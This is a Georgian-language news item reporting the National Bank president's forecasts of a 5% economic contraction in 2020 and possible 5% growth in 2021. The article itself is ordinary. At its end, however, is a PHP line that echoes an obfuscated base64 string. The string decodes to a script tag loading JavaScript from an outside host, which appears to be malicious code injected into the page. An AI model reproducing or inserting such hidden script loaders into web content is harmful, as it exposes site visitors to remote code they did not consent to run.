celsiusi
ავერსი შნაიდერი
საქართველოს ეროვნული ბანკის პრეზიდენტის, კობა გვენეტაძის განცხადებით, შესაძლებელია, რომ 2021 წელს საქართველოს ეკონომიკა 5%-ით გაიზარდოს.
 
კითხვაზე, რამდენად რეალისტურია 2020 წელს 5%-იანი კლების და 2021 წელს 4.3%-იანი ეკონომიკური ზრდის მიღწევა, კობა გვენეტაძე აცხადებს, რომ მიმდინარე წლისთვის არსებული ეკონომიკური კლების პროგნოზი რეალისტურია.
 
„ვფიქრობ, რომ დღევანდელი გადმოსახედიდან, 2020 წელს 5%-იანი ვარდნის შესახებ პროგნოზი საკმაოდ რეალისტურია. 10 თვის მონაცემებით, ეკონომიკური ზრდა -5.1%-ია და ნოემბერ-დეკემბერშიც დაახლოებით ამ დონის ვარდნას მოველით. გარდა ამისა, რადგან ახლა დაწესებული შეზღუდვები გაზაფხულზე დაწესებულთან შედარებით მსუბუქია, ვფიქრობ, რომ ეს ვარდნა ახლოს იქნება იმ მაჩვენებელთან, რომელიც 10 თვეში გვქონდა. ამასთან, აღსანიშნავია, რომ საკრედიტო აქტივობა საკმაოდ მაღალია, რაც ეკონომიკას და შიდა მოთხოვნას ეხმარება.
 
რაც შეეხება მომავალ წელს, ვფიქრობთ, რომ 2021 წელს ეკონომიკის 5%-ით ზრდა შესაძლებელია იყოს. არ დაგვავიწყდეს, რომ ფისკალური სტიმულიც საკმაოდ მაღალ დონეზეა დაგეგმილი, ამავე დროს საკრედიტო აქტივობაც ნარჩუნდება. უნდა გავითვალისწინოთ, რომ ასეთი პანდემიის დროს პროგნოზების გაკეთება ძალიან რთულია და ბევრ გაურკვევლობას უკავშირდება“,-აღნიშნა მან.
 
ცნობისთვის, 2021 წლის ბიუჯეტი 4.3%-იან ეკონომიკური ზრდის მაჩვენებელზე დაიგეგმა. ამასთან, 2020 წელს ეკონომიკის 5%-იანი კლებაა პროგნოზირებული.
1620
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");